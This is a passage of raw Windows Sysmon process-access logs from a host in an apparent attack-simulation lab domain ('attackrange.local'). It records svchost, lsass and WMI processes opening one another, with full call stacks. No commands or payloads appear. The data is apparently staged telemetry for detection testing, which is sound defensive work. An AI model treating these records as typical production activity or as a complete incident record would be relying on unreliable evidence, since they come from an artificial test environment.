ows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001480Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001479Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001478Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.690{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-646A-6064-0A00-00000000AE01}840C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001477Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001476Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001475Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001474Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001473Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001472Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.674{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001471Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001470Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001469Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001468Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001467Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001466Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.659{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001465Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001464Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001463Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.612{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001462Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.549{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646E-6064-1A00-00000000AE01}2284C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001461Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001460Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001459Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.534{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001458Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001457Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:50.518{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001456Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
